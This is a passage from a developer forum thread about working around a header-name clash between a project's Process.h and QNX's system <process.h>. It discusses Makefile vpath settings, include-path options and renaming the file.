... then, down after the line where $(MKFILES_ROOT)/qmacros.mk is included, you need to add:
vpath %.cpp $(ENGINE_PATHS)
You should be able to modify this to support multiple file types as follows:
SUPPORTED_EXTS := cpp cxx c S s
ENGINE_SRCS = $(foreach path,$(ENGINE_PATHS),$(wildcard $(foreach ext,$(SUPPORTED_EXTS),$(path)/*.$(ext))))
SRCS += $(ENGINE_SRCS)
... then...
VPATH += $(ENGINE_PATHS)
Again, this is all pretty complicated just to get around a naming conflict on account of the existence of a non-standard header in QNX, and I'm still not aware if there may be any unintended side-effects to circumventing the standard QNX build mechanisms like this.
Dan.
06-19-2012 01:15 PM
06-19-2012 03:15 PM
I would argue that the qnx/usr/include is the OS-supplied include files for your target build. See e.g.
As for your solution, it's starting to sound tricky.
Is the competing process.h in 3rd party software or your own project? That affects what you can do.
The issue is that sometimes you want the one file, sometimes you want the other file, sometimes you might want both, but they are called the same thing so you have to distinguish them based on their path. So playing with -I options is really getting around the issue that there is a name conflict with the include files for this target build.
Here are some other options, one of which you've already mentioned but not selected in your case:
- rename your process.h. Check that you don't collide with any other QNX system include file.
e.g. prepend with a subsystem suffix
- don't add the include directory for your process.h but instead #include relative directories
- put the parent directory of your process.h in the include path, and include "mynamespace/process.h"
- if the non-qnx process.h is self-contained in a subsystem, build that subsystem as a separate library. Unfortunately, this subsystem is likely to need unistd.h, which would eliminate this choice.
- add -I{QNX_TARGET} and explicitly include <usr/include/process.h> before including the file which pulls in unistd.h
I hope this either simplifies your solution or makes you satisfied with your current handling.
What you actually do depends of course on your specific project.
Stuart
06-19-2012 04:02 PM
With regards to each of your suggestions:
- rename your process.h. Check that you don't collide with any other QNX system include file.
e.g. prepend with a subsystem suffix
Yes, this is a valid option; however this a large cross-platform project that's targetted under mutliple systems, and according to our naming conventions I'd need to rename the Process class throughout the project to match it, so I'm hesitant (but not ruling out the possibility) to make such a wide-impacting change just to accommodate the quirks of this OS. (It also doesn't protect or solve future naming collisions.)
- don't add the include directory for your process.h but instead #include relative directories
- put the parent directory of your process.h in the include path, and include "mynamespace/process.h"
Neither of these will work, unfortunately, because there are source files in the directory as well, and as soon as the directories are added to EXTRA_SRCVPATH they get added to EXTRA_INCVPATH automatically, so <unistd.h> will still pick up my Process.h instead of <process.h>.
- if the non-qnx process.h is self-contained in a subsystem, build that subsystem as a separate library. Unfortunately, this subsystem is likely to need unistd.h, which would eliminate this choice.
Yep...
- add -I{QNX_TARGET} and explicitly include <usr/include/process.h> before including the file which pulls in unistd.h
This is an interesting idea, but ultimately wouldn't work, at least not in my scenario. <unistd.h> would still pull in my Process.h, which has requirements based on a common header that's included via the command line, so it still wouldn't compile.
I'm going to continue on this route, and hope that I don't run into other problems as a result from it. If further problems do manifest, I will probably grit my teeth and rename the offending file.
Thanks,
Dan.
|
https://supportforums.blackberry.com/t5/Native-Development/Boost-headers-won-t-compile/m-p/1775017
|
CC-MAIN-2017-04
|
refinedweb
| 1,231
| 64.81
|
There are a few different ways to set processor affinity and Edmond Woychowsky shows you two programmatic ways he has used in his projects.
Early on in the history of the personal computer an author and technology prophet, Jerry Pournelle, authored a law that went like this, "One user, one CPU". At the time a statement like that was something akin to heresy. It was, after all, a time when dinosaurs ruled the computing world and personal computers were looked upon as little more than very expensive toys.
However, time passed and in subsequent years Pournelle's law came to be considered somewhat conservative. So much so, in fact, that he actually modified his law to "One user, at least one CPU", which is essentially where we are now. Unfortunately, for developers, Jerry Pournelle never actually said what to use the additional processing power for.
This blog post is also available in the PDF format as a TechRepublic Download.
My own devices
As a developer left to my own devices the first use that I'd consider would be a multi-threaded application, but what if my goal was something that didn't readily lend itself to multi-threading or what if it was a prepackaged application?
Either of those scenarios would be an issue, fortunately there is a solution to both that dates back to the very-same days when personal computers were considered little more than very expensive toys. A point of interest to consider, is that, in those days, some of the high-end dinosaur computers actually had more than one CPU, what the system administers in those days would do with those machines is to treat them as multiple computers in a single box.
Alright, now that I know what I want to do, that only leaves the question of just how to accomplish the task. Fortunately there are both a programmatic solution for my own applications and a lazy approach for pre-written software. Being counted among the lazy, let's take a look at that approach first.
Manually setting processor affinityFigure A shows soffice.exe task in the task manager which is the file for Open Office, the open source office application suite, along with the various options available. One of these options is Processor Affinity, which when clicked on displays the pop-up shown in Figure B that has a check box for each core. Processor affinity is set by checking one or the other check box. In cases where both are checked the operating system will attempt to balance the load between the cores.
Figure A
Vista task manager
Figure B
Processor affinity
Now the real fun begins, because as the administrator of my own little computer I have both the power and ability to check or un-check the boxes as I feel necessary. Or, as I say when I'm feeling a bit of megalomania, "Let it run on the second core today." The result of this mental aberration is displayed in Figure C.
Figure C
Open Office on the second core
Setting processor affinity in C#
Ah, here is where I can really let my megalomania run free, programmatically picking which core or cores my application will run on, now that's real power. Alright, I admit it, in my case it's more of a not completely locking-up the computer if things don't work-out the way I intended. Come to think of it; things not going as intended is a perfect demonstration of processor affinity. Nothing says whoops like a tight loop.
To work with processor affinity in the .NET environment it is necessary to use the System.Diagnostics namespace which contains Process class from which the GetCurrentProcess() method is used to obtain a new process and associate it with the current active process. Of course, if I was working with a multi-treaded application I'd be using a different method.Once the process is obtained the ProcessorAffinity property can be used to either set or get the processor affinity. It is important to remember that the ProcessorAffinity property is a bit mask where each bit represents a single CPU, so a system with a dual core CPU the possible values are as shown in Table A.
Table AThe code required to demonstrate processor affinity is surprisingly simple as Listing A illustrates. The result of the code is shown in Figures D and E.
Listing A
Processor Affinity console application
using System;
using System.Diagnostics;
using System.Text;
namespace caAfinity
{
class Program
{
static void Main(string[] args)
{
Console.WriteLine("Current ProcessorAffinity: {0}", Process.GetCurrentProcess().ProcessorAffinity);
Process.GetCurrentProcess().ProcessorAffinity = (System.IntPtr)2;
Console.WriteLine("Current ProcessorAffinity: {0}", Process.GetCurrentProcess().ProcessorAffinity);
while (true)
{ } // Tight CPU loop
}
}}
Figure D
Demonstration running
Figure E
Vista task manager
Conclusion
Developers being what they are, when given more of anything will undoubtedly find some way to use it. Don't believe me? Leaving an unattended pizza anywhere near a group of developers will prove me right. Seriously though, I hope that this example of what to do with the bounty of processing that Jerry Pournelle foresaw is of some use, especially for those occasions when, for one reason of another, multi-threading is out of the question.
|
https://www.techrepublic.com/blog/software-engineer/set-processor-affinity-programmatically-in-a-multi-core-system/
|
CC-MAIN-2021-43
|
refinedweb
| 877
| 51.68
|
#include <NOX_LAPACK_Group.H>
#include <NOX_LAPACK_Group.H>
Inheritance diagram for NOX::LAPACK::Group:
[virtual]
Applies the inverse of the Jacobian matrix to the given input vector and puts the answer in result.
Computes
where is the Jacobian, is the input vector, and is the result vector.
The "Tolerance" parameter specifies that the solution should be such that
params
Reimplemented from NOX::Abstract::Group.
NOX::DeepCopy
Create a new Group of the same derived type as this one by cloning this one, and return a ref count pointer to the new group.
If type is NOX::DeepCopy, then we need to create an exact replica of "this". Otherwise, if type is NOX::ShapeCopy, we need only replicate the shape of "this" (only the memory is allocated, the values are not copied into the vectors and Jacobian). Returns NULL if clone is not supported.
Implements NOX::Abstract::Group.
Reimplemented in LOCA::LAPACK::Group.
Compute and store F(x).
Compute and store gradient.
We can pose the nonlinear equation problem as an optimization problem as follows:
In that case, the gradient (of ) is defined as
Compute and store Jacobian.
Recall that
The Jacobian is denoted by and defined by
Reimplemented from NOX::Abstract::Group.
Compute the Newton direction, using parameters for the linear solve.
The Newton direction is the solution, s, of
The parameters are from the "Linear %Solver" sublist of the "Direction" sublist that is passed to solver during construction.
The "Tolerance" parameter may be added/modified in the sublist of "Linear Solver" parameters that is passed into this function. The solution should be such that
Compute x = grp.x + step * d.
Let denote this group's solution vector. Let denote the result of grp.getX(). Then set
Throw an error if the copy fails.
Implements NOX::Abstract::Group.
Return 2-norm of F(x).
In other words,
Return true if the gradient is valid.
Return true if the Jacobian is valid.
Return true if the Newton direction is valid.
Copies the source group into this group.
Set the solution vector x to y.
|
http://trilinos.sandia.gov/packages/docs/r7.0/packages/nox/doc/html/classNOX_1_1LAPACK_1_1Group.html
|
CC-MAIN-2014-10
|
refinedweb
| 341
| 59.6
|
Fozzie
Ruby gem for registering statistics to a Statsd server in various ways.
Requirements
- A Statsd server
- Ruby 1.9
Basic Usage
Send through statistics depending on the type you want to provide:
Increment counter
Stats.increment 'wat' # increments the value in a Statsd bucket called 'some.prefix.wat' - # the exact bucket name depends on the bucket name prefix (see below)
Decrement counter
Stats.decrement 'wat'
Decrement counter - provide a value as integer
Stats.count 'wat', 5
Basic timing - provide a value in milliseconds
Stats.timing 'wat', 500
Timings - provide a block to time against (inline and do syntax supported)
Stats.time 'wat' { sleep 5 } Stats.time_to_do 'wat' do sleep 5 end Stats.time_for 'wat' { sleep 5 }
Gauges - register arbitrary values
Stats.gauge 'wat', 99
Events - register different events
Commits
Stats.commit Stats.committed
Builds
Stats.built Stats.build
Deployments
Stats.deployed
With a custom app: ``` ruby Stats.deployed 'watapp'
Stats.deploy ```
With a custom app:
ruby
Stats.deploy 'watapp'
Custom
Stats.event 'pull'
With a custom app:
Stats.event 'pull', 'watapp'
Boolean result - pass a value to be true or false, and increment on true
Stats.increment_on 'wat', duck.valid?
Sampling
Each of the above methods accepts a sample rate as the last argument (before any applicable blocks), e.g:
Stats.increment 'wat', 10 Stats.decrement 'wat', 10 Stats.count 'wat', 5, 10
Monitor
You can monitor methods with the following: ``` ruby class FooBar
_monitor def zar # my code here... end
_monitor("my.awesome.bucket.name") def quux # something end
end
``
This will register the processing time for this method, everytime it is called, under the Graphite bucketfoo_bar.zar`.
This will work on both Class and Instance methods.
Bulk
You can send a bulk of metrics using the
bulk method:
ruby
Stats.bulk do
increment 'wat'
decrement 'wot'
gauge 'foo', rand
time_to_do 'wat_timer' { sleep 4 }
end
This will send all the given metrics in a single packet to the statistics server.
Namespaces
Fozzie supports the following namespaces as default
Stats.increment 'wat' S.increment 'wat' Statistics.increment 'wat' Warehouse.increment 'wat'
You can customise this via the YAML configuration (see instructions below)
Configuration
Fozzie is configured via a YAML or by setting a block against the Fozzie namespace.
YAML
Create a
fozzie.yml within a
config folder on the root of your app, which contains your settings for each env. Simple, verbose example below.
development: appname: wat host: '127.0.0.1' port: 8125 namespaces: %w{Foo Bar Wat} prefix: %{foo bar car} test: appname: wat host: 'localhost' port: 8125 namespaces: %w{Foo Bar Wat} production: appname: wat host: 'stats.wat.com' port: 8125 namespaces: %w{Foo Bar Wat}
Configure block
Fozzie.configure do |config| config.appname = "wat" config.host = "127.0.0.1" config.port = 8125 config.prefix = [] end
Prefixes
You can inject or set the prefix value for your application.
Fozzie.configure do |config| config.prefix = ['foo', 'wat', 'bar'] end
Fozzie.configure do |config| config.prefix << 'dynamic-value' end
Prefixes are cached on first use, therefore any changes to the Fozzie configure prefix after first metric is sent in your application will be ignored.
Middleware
To time and register the controller actions within your Rack and Rails application, Fozzie provides some middleware.
Rack
require 'rack' require 'fozzie/rack/middleware' app = Rack::Builder.new { use Fozzie::Rack::Middleware lambda { |env| [200, {'Content-Type' => 'text/plain'}, 'OK'] } }
Rails
See Fozzie Rails.
Bucket name prefixes
Fozzie automatically constructs bucket name prefixes from app name, hostname, and environment. For example:
Stats.increment 'wat'
increments the bucket named
text
app-name.your-computer-name.development.wat
When working on your development machine. This allows multiple application instances, in different environments, to be distinguished easily and collated in Graphite quickly.
The app name can be configured via the YAML configuration.
Low level behaviour
The current implementation of Fozzie wraps the sending of the statistic in a timeout and rescue block, which prevent long host lookups (i.e. if your stats server disappears) and minimises impact on your code or application if something is erroring at a low level.
Fozzie will try to log these errors, but only if a logger has been applied (which by default it does not). Examples:
require 'logger' Fozzie.logger = Logger.new(STDOUT)
require 'logger' Fozzie.logger = Logger.new 'log/fozzie.log'
This may change, depending on feedback and more production experience.
Credits
Currently supported and maintained by Marc Watts @ Lonely Planet Online.
Big thanks and Credits:
-
Etsy whose Statsd product has enabled us to come such a long way in a very short period of time. We love Etsy.
reinh for his statsd Gem.
Please contact me on anything... improvements will be needed and are welcomed greatly.
|
http://www.rubydoc.info/gems/fozzie/frames
|
CC-MAIN-2015-27
|
refinedweb
| 779
| 61.22
|
Concurrency Concurrency
One of the commonly mentioned fallouts of the new processor architectures is the new face of the applications written on the JVM. In order to take performance advantage from the multiple cores, applications need to be more concurrent, programmers need to find more parallelism within the application domain. Herb Sutter sums it up nicely in this landmark article :.
Look Maa ! No Threads !
Writing multi-threaded code is hard, and, as the experts say, the best way to deal with multi-threading is to avoid it. The two dominant paradigms of concurrency available in modern day languages are :
- Shared State with Monitors, where concurrency is achieved through multiple threads of execution synchronized using locks, barriers, latches etc.
- Message Passing, which is a shared-nothing model using asynchronous messaging across lightweight processes or threads.
The second form of concurrent programming offers a higher level of abstraction where the user does not have to interact directly with the lower level primitives of thread models. Erlang supports this model of programming and has been used extensively in the telecommunications domain to achieve a great degree of parallelism. Java supports the first model, much to the horror of many experts of the domain and unless you are Brian Goetze or Doug Lea, designing concurrent applications in Java is hard.
Actors on the JVM
Actor based concurrency in Erlang is highly scalable and offers a coarser level of programing model to the developers. Have a look at this presentation by Joe Armstrong which illustrates how the share-nothing model, lightweight processes and asynchronous messaging support makes Erlang a truly Concurrency Oriented Programming Language. The presentation also gives us some interesting figures - an Erlang based Web server supported more than 80,000 sessions while Apache crashed at around 4,000.
The new kid on the block, Scala brings Erlang style actor based concurrency on the JVM. Developers can now design scalable concurrent applications on the JVM using the actor model of Scala which will automatically take advantage of the multicore processors, without programming to the complicated thread model of Java. In applications which demand large number of concurrent processes over a limited amount of memory, threads of the JVM, prove to be of significant footprint because of stack maintenance overhead and locking contentions. Scala actors provide an ideal model for programming in the non-cooperative virtual machine environment. Coupled with the pattern matching capabilities of the Scala language, we can have the full power of Erlang style concurrency on the JVM. The following example is from this recent paper by Philipp Haller and Martin Odersky:
class Counter extends Actor {
override def run(): unit = loop(0)
def loop(value: int): unit = {
Console.println("Value: " + value)
receive {
case Incr() => loop(value + 1)
case Value(a) => a ! value; loop(value)
case Lock(a) => a ! value
receive { case UnLock(v) => loop(v) }
case _ => loop(value)
}
}
}
and its typical usage also from the same paper :
val counter = new Counter // create a counter actor
counter.start() // start the actor
counter ! Incr() // increment the value by sending the Incr() message
counter ! Value(this) // ask for the value
// and get it printed by waiting on receive
receive { case cvalue => Console.println(cvalue) }
Scala Actors
In Scala, actors come in two flavors -
- Thread based actors, that offer a higher-level abstraction of threads, which replace error-prone shared memory accesses and locks by asynchronous message passing and
- Event based actors, which are threadless and hence offer the enormous scalability that we get in Erlang based actors.
As the paper indicates, event based actors offer phenomenal scalability when benchmarked against thread based actors and thread based concurrency implementations in Java. The paper also demonstrates some of the cool features of library based design of concurrency abstractions in the sense that Scala contains no language support for concurrency beyond the standard thread model offered by the host environment.
I have been playing around with Scala for quite some time and have been thoroughly enjoying the innovations that the language offers. Actor based concurrency model is a definite addition to this list, more so since it promises to be a great feature that programmers would love to have as part of their toolbox while implementing on the JVM. JVM is where the future is, and event based actors in Scala will definitely be one of the things to watch out for ..
8 comments:
How about dataflow concurrency, very simplistic and error-free way of dealing with many threads.
See Mozart/Oz -language.
This is exactly what games are trying to do - cut back threading :)
Async concurrency paradigm was used in many environments *MANY* years ago, it's nothing new. Delphi's ICS components worked that way, for example.
Scala has dataflow concurrency in the form of a library that does futures and promises.
One of my Professors was working on an Actor Language extension to Java called SALSA:
I found that dealing with actor location was the largest annoyance... aside from the multi-step compiling.
[for Lozano :]
Asynch concurrency paradigm is nothing new. But the points of interest with Scaal actors are 2-fold :
a) Scala brings Erlang style concurrency on the JVM and today we are approaching the situation where JVM is being portrayed as the default platform for your application.
b) Threaded actors in Scala provide a higher level of abstraction than raw threads and locks. While event based actors provide huge scalability.
So it's a win-win situation.
Interesting but: I know the Erlang/Yaws comparison with Apache and I know Erlang can map all its threads to one OS-thread to avoid overhead. But in order to exploit multiple CPUs you need to start multiple processes, not just Erlang threads. Which is possible in Erlang, too, but how much overhead can we still save then? Does the message passing approach really make the scalability gains or isn't it more the saved overhead by mapping multiple Erlang threads to one OS-thread? Note that we have seen big scalability gains with JVMs that did "Green Threads" - i.e. an N to one mapping - and there are also JVMs that can do N to M in order to exploit multiple CPUs while still keeping then umber of native threads low. So, to me, the question is: How much scalability do we get from the thread mapping and how much is really due to the radical "message passing share nothing" approach? Is explicit threading really that bad or did we just fall victim to "suboptimal schedulers" in existing operating systems?
it the rumination of a programmer is very nice
regards
aegan stills, songs
|
https://debasishg.blogspot.com/2006/11/threadless-concurrency-on-jvm-aka-scala.html
|
CC-MAIN-2018-05
|
refinedweb
| 1,100
| 50.36
|
Corresponding value of a parameter
Hello, I am quite new to Sage and I have the following question. In my computations I have a quadratic form: $x^T A x = b $ , where the matrix A is defined already as a symmetric matrix, and x is defined as
import itertools X = itertools.product([0,1], repeat = n) for x in X: x = vector(x) print x.
I don't understand two things. There is no variable x or b in your code. Furthermore, if you run this code what you get is an empty iterator W and a vector w equal to (1,1,...,1)
(note that you forgot the line import itertools in your command)
My apologies for ambiguity. I have edited the post. Hope it is now clearer.
the whole code with defined previously matrix A looks like this:
@Xenia It is much clearer now. I updated my answer below.
|
https://ask.sagemath.org/question/39911/corresponding-value-of-a-parameter/?sort=oldest
|
CC-MAIN-2021-49
|
refinedweb
| 151
| 75.2
|
Originally posted on mlwhiz.
Pandas is one of the best data manipulation libraries in recent times. It lets you slice and dice, groupby, join and do any arbitrary data transformation. You can take a look at this post, which talks about handling most of the data manipulation cases using a straightforward, simple, and matter of fact way using Pandas.
But even with how awesome pandas generally is, there sometimes are moments when you would like to have just a bit more. Say you come from a SQL background in which the same operation was too easy. Or you wanted to have more readable code. Or you just wanted to run an ad-hoc SQL query on your data frame. Or, maybe you come from R and want a replacement for sqldf.
For example, one of the operations that Pandas doesn’t have an alternative for is non-equi joins, which are quite trivial in SQL.
In this series of posts named Python Shorts, I will explain some simple but very useful constructs provided by Python, some essential tips, and some use cases I come up with regularly in my Data Science work.
This post is essentially about using SQL with pandas Dataframes.
But, what are non-equi joins, and why would I need them?
Let’s say you have to join two data frames. One shows us the periods where we offer some promotions on some items. And the second one is our transaction Dataframe. I want to know the sales that were driven by promotions, i.e., the sales that happen for an item in the promotion period.
We can do this by doing a join on the item column as well as a join condition (TransactionDt≥StartDt and TransactionDt≤EndDt). Since now our join conditions have a greater than and less than signs as well, such joins are called non-equi joins. Do think about how you will do such a thing in Pandas before moving on.
The Pandas Solution
So how will you do it in Pandas? Yes, a Pandas based solution exists, though I don’t find it readable enough.
Let’s start by generating some random data to work with.
import pandas as pd import random import datetime def random_dt_bw(start_date,end_date): days_between = (end_date - start_date).days random_num_days = random.randrange(days_between) random_dt = start_date + datetime.timedelta(days=random_num_days) return random_dt def generate_data(n=1000): items = [f"i_{x}" for x in range(n)] start_dates = [random_dt_bw(datetime.date(2020,1,1),datetime.date(2020,9,1)) for x in range(n)] end_dates = [x + datetime.timedelta(days=random.randint(1,10)) for x in start_dates] offerDf = pd.DataFrame({"Item":items, "StartDt":start_dates, "EndDt":end_dates}) transaction_items = [f"i_{random.randint(0,n)}" for x in range(5*n)] transaction_dt = [random_dt_bw(datetime.date(2020,1,1),datetime.date(2020,9,1)) for x in range(5*n)] sales_amt = [random.randint(0,1000) for x in range(5*n)] transactionDf = pd.DataFrame({"Item":transaction_items,"TransactionDt":transaction_dt,"Sales":sales_amt}) return offerDf,transactionDf
offerDf,transactionDf = generate_data(n=100000)
You don’t need to worry about the random data generation code above. Just know how our random data looks like:
Once we have the data, we can do the non-equi join by merging the data on the column item and then filtering by the required condition.
merged_df = pd.merge(offerDf,transactionDf,on='Item') pandas_solution = merged_df[(merged_df['TransactionDt']>=merged_df['StartDt']) & (merged_df['TransactionDt']<=merged_df['EndDt'])]
The result is below just as we wanted:
The PandaSQL solution
The Pandas solution is alright, and it does what we want, but we could also have used PandaSQL to get the same thing done in a much more readable way.
PandaSQL provides us with a way to write SQL on Pandas Dataframes. So if you have got some SQL queries already written, it might make more sense to use pandaSQL rather than converting them to pandas syntax. To get started with PandaSQL we install it simply with:
pip install -U pandasql
Once we have pandaSQL installed, we can use it by creating a pysqldf function that takes a query as an input and runs the query to return a Pandas DF. Don’t worry about the syntax; it remains more or less constant.
from pandasql import sqldf pysqldf = lambda q: sqldf(q, globals())
We can now run any SQL query on our Pandas data frames using this function. And, below is the non-equi join, we want to do in the much more readable SQL format.
q = """ SELECT A.*,B.TransactionDt,B.Sales FROM offerDf A INNER JOIN transactionDf B ON A.Item = B.Item AND A.StartDt <= B.TransactionDt AND A.EndDt >= B.TransactionDt; """ pandaSQL_solution = pysqldf(q)
The result is a pandas Dataframe as we would expect. The index is already reset for us, unlike before.
Caveats:
While the PandaSQL function lets us run SQL queries on our Pandas data frames and is an excellent tool to be aware of in certain situations, it is not as performant as pure pandas syntax.
When we time Pandas against the more readable PandaSQL, we find that the PandaSQL takes around 10x the time of native Pandas.
Conclusion
In this post of the Python Shorts series, we learned about pandaSQL, which lets us use SQL queries on our Dataframes. We also looked at how to do non-equi joins using both native pandas as well as pandaSQL.
While the PandaSQL library is not as performant as native pandas, it is a great addition to our data analytics toolbox when we want to do ad-hoc analysis and to people who feel much more comfortable with using SQL queries.
For a closer look at the code for this post, please visit my GitHub repository, where you can find the code for this post as well as all my posts.
Continue Learning.
|
https://learningactors.com/how-to-use-sql-with-pandas/
|
CC-MAIN-2021-31
|
refinedweb
| 968
| 64.1
|
Our world is generating more and more data, which people and businesses want to turn into something useful. This naturally attracts many data scientists – or sometimes called data analysts, data miners, and many other fancier names – who aim to help with this extraction of information from data.
A lot of data scientists around me graduated in statistics, mathematics, physics or biology. During their studies they focused on individual modelling techniques or nice visualizations for the papers they wrote. Nobody had ever taken a proper computer science course that would help them tame the programming language completely and allow them to produce a nice and professional code that is easy to read, can be re-used, runs fast and with reasonable memory requirements, is easy to collaborate on and most importantly gives reliable results.
I am no exception to this. During my studies we used R and Matlab to get a hands-on experience with various machine learning techniques. We obviously focused on choosing the best model, tuning its parameters, solving for violated model assumptions and other rather theoretical concepts. So when I started my professional career I had to learn how to deal with imperfect input data, how to create a script that can run daily, how to fit the best model and store a predictions in a database. Or even to use them directly in some online client facing point.
To do this I took the standard path. Reading books, papers, blogs, trying new stuff working on hobby projects, googling, stack-overflowing and asking colleagues. But again mainly focusing on overcoming small ad hoc problems.
Luckily for me, I’ve met a few smart computer scientists on the way who showed me how to develop code that is more professional. Or at least less amateurish. What follows is a list of the most important points I had to learn since I left the university. These points allowed me to work on more complex problems both theoretically and technically. I must admit that making your coding skills better is a never ending story that restarts with every new project.
1. Parameters, constants and functions
You are able to easily re-use your code if you make it applicable to similar problems as well. A simple wisdom that is however quite tricky to apply in practice. Your building blocks here are parameters, constants and functions.
Parameters enable you to change important variables and settings in one place. You should never have anything hard-coded in the body of your code. Constants help you to define static variables that cannot be altered. Constants are useful for example when you need to compare strings.
library(caret) library(futile.logger) #' constants DATASET_IRIS <- 'iris' DATASET_MTCARS <- 'mtcars' IRIS_TARGET <- 'Sepal.Length' MTCARS_TARGET <- 'mpg' MODELLING_METHOD_RF <- 'random forest' MODELLING_METHOD_GBM <- 'gradient boosting machine' #' parameters DATASET <- DATASET_IRIS MODELLING_METHOD <- MODELLING_METHOD_GBM #' load data flog.info(paste0('Loading ', DATASET, ' dataset')) if (DATASET == DATASET_IRIS){ data(iris) df <- iris target_variable <- IRIS_TARGET } else if (DATASET == DATASET_MTCARS){ data(mtcars) df <- mtcars target_variable <- MTCARS_TARGET } #' create formula modelling_formula <- as.formula(paste0(target_variable, '~.')) #' train model flog.info(paste0('Fitting ', MODELLING_METHOD)) if(MODELLING_METHOD == MODELLING_METHOD_RF){ set.seed(42) my_model <- caret::train(form=modelling_formula, data=df, method='rf') } else if(MODELLING_METHOD == MODELLING_METHOD_GBM){ set.seed(42) my_model <- caret::train(form=modelling_formula, data=df, method='gbm', verbose=FALSE) } my_model
Functions are key ingredients of programming. Always put the repetitive tasks in your code into functions. These functions should always aim to perform one task and be general enough to be used for similar cases. How general typically depends on what you want to achieve.
Even helper functions should be well documented. The absolute minimum is to summarize what the function should do and what is the meaning of input parameters. I usually use roxygen comments so that the function can be later used in an R package without much extra work. For more details please see here.
#' Calculates Root Mean Squeared Error #' #' @param observed vector with observed values #' @param predicted vector with predicted values #' @return numeric f_calculate_rmse <- function(observed, predicted){ error <- observed - predicted return(round(sqrt(mean(error^2)), 2)) }
You have to test the functions you are writing anyway so it is a good idea to automate this step in case you would like to update the functions in the future. This is important especially if you plan to wrap you functions in a package. Nice way to do this is using testthat package. Here is a nice page how to run your tests automatically.
library(testthat) library(Metrics) #' testing of f_calculate_rmse test_that('Root Mean Square Error', { #' create some data n <- 100 observed <- rnorm(n) predicted <- rnorm(n) my_rmse <- f_calculate_rmse(observed=observed, predicted=predicted) #' same results as Metrics::rmse expect_equal(my_rmse, Metrics::rmse(actual=observed, predicted=predicted), tolerance=.05) #' output is numeric and non-negative expect_that(my_rmse, is_a("numeric")) expect_that(my_rmse >= 0, is_true()) })
Obviously one does not need to write all the functions needed. A great advantage of R is that there are so many functions available in thousands of available libraries. To make sure you will not run into namespace problems when two loaded libraries both contain a function with the same name, specify the package you want to use by
packagename::functionname(). An example is the
summarise function when both plyr and dplyr packages are loaded.
library(plyr) library(dplyr) #' load data data(mtcars) #' see what happens summarise(group_by(mtcars, cyl), n=n()) plyr::summarise(group_by(mtcars, cyl), n=n()) dplyr::summarise(group_by(mtcars, cyl), n=n())
2. Style
You will be reading your code again in the future so be nice to yourself (and anyone else who will have to read it) and have a consistent coding style. A lot of people use Google’s R style or Hadley Wickham’s style.
Here I also need to stress that it is important to comment your code. Especially when you consider your solution brilliant and obvious. Also please do not be afraid of long but self-explanatory function and variable names.
3. Version control
Always use version control for your projects. It will save you a lot of nerves. It has so many advantages. Here is a nice summary of them. The most important to me are
- ability to revert back to previous versions of my code
- clean project folder because I can delete anything without fear
- easy to invite colleagues to collaborate on the project
Using git is easy. Especially from RStudio.
4. Development
Development doesn’t necessarily need to be a messy process.
Your code is not working? Then you need to be able to quickly locate the problem and fix it. Luckily, RStudio has a lot of built-in debugging tools so that you can stop the code at the point where you suspect the problem is arising, and look at and/or walk through the code, step-by-step at that point.
#' create some data set.seed(42) n <- 100 observed <- rnorm(n) predicted <- rnorm(n) #' debug the function debug(f_calculate_rmse) f_calculate_rmse(observed=observed, predicted=predicted)
Each programming language has its own strengths and weaknesses that you need to keep in mind. You don’t want your code to run too slow or use too much memory. A handy tool for this is profiling. Again, RStudio comes with a solution to this. Profiling enables you to detect where the execution of you code lasts the longest and where it uses the most memory. Do not rely on your intuition when optimizing your code! You should also check how the running time and memory requirements increase with the size of data. This will give you an idea for what data can be your code used and what could be the consequences for scaling.
library(profvis) #' profiling of f_calculate_rmse profvis({ set.seed(42) n <- 1e5 observed <- rnorm(n) predicted <- rnorm(n) f_calculate_rmse(observed=observed, predicted=predicted) })
During the development you will encounter many problems. Each time this happens you should improve the error handling in your code and raise a self-explanatory warning or error. Especially mind the data types and missing parameters.
5. Deployment
Deployment means that your code will need to run automatically. Or at least without you executing it line by line. In this case it is very helpful to know what is going on and whether the execution went well without any problems. For this purpose I use futile.logger package. It is a light solution and enables me to log the execution of my codes both to screen or file. I just need to write understandable messages in the correct places in my code.
library(futile.logger) #' logging setup flog.threshold(DEBUG) # level of logging flog.appender(appender.file('foo.log')) # log to file #' logging flog.info('Some info message') flog.debug('Some debug message') flog.warn('Some warning message') flog.error('Some error message')
Automated code execution is typically done by Cron scheduler using
Rscript foo.r. This command runs the
foo.r code. Very often you want to specify some parameters of the script so that you can analyse different data, specify which machine learning method to use, if you want to retrain the model and so on. For this I use the argparse package. Following code enables my to specify the csv with input data in command line:
Rscript my_code.r -if latest_data.csv.
library(argparse) #' default parameters INPUT_FILE_DEFAULT <- 'input.csv' #' create parser object parser <- ArgumentParser(description='My code') #' define arguments parser$add_argument('-if', '--input_file', default=INPUT_FILE_DEFAULT, type='character', help='Location of csv file with input data') #' get command line options args <- parser$parse_args() #' load data data <- read.csv(args$input_file)
6. Plotting
Data visualization is the “shop window” of analytics. Therefore you will probably spend a lot of time fine-tuning each plot. Good best practice is the following.
- define style, color palette and any other parameters in a separate script
- write a function to create a plot object
- use another function to either show the plot or save it to a file
Let’s see how it works in the following basic example.
library(ggplot2) data(iris) #' some basic style my_collors <- list('red'='#B22222') #' function to create histogram f_create_histogram <- function(df, column){ p <- ggplot(df, aes_string(x=column)) + geom_histogram(binwidth=.1, fill=my_collors$red) + ggtitle(paste0('Histogram of ', column)) return(p) } #' create plots sepal_length_hist <- f_create_histogram(iris, 'Sepal.Length') sepal_width_hist <- f_create_histogram(iris, 'Sepal.Width') #' show sepal_length_hist #' save ggsave('sepal_width_hist.png', plot=sepal_width_hist)
7. Reproducibility
Make sure your code is reproducible. Because a lot of data science steps involve random sampling or optimization, we need to make sure that we can repeat the code with the same results. That is why it is critical to use
set.seed() function.
> set.seed(42); sample(LETTERS, 5) [1] "X" "Z" "G" "T" "O" > set.seed(42); sample(LETTERS, 5) [1] "X" "Z" "G" "T" "O" > sample(LETTERS, 5) [1] "N" "S" "D" "P" "W"
8. Combine tools
Once you become confident in R programming you tend to do everything in R. Please do not forget that there are many other tools available and thanks to connectors they can be used together with R. For example I very often combine R with Python or SQL databases.
Pingback: Distilled News | Data Analytics & R
Hello, can you also recommend an R tutorial for beginners? Thank you!
Hey!
There are so many tutorials around that it’s hard to pick one. I personally find these books very useful:
–
–
–
Pingback: This Week in Data Science (March 14, 2017) – Be Analytics
Pingback: 八招提升你的 R 语言编程能力 - 数据分析网
|
https://blog.alookanalytics.com/2017/03/08/8-simple-ways-how-to-boost-your-coding-skills-not-just-in-r/
|
CC-MAIN-2020-29
|
refinedweb
| 1,905
| 56.45
|
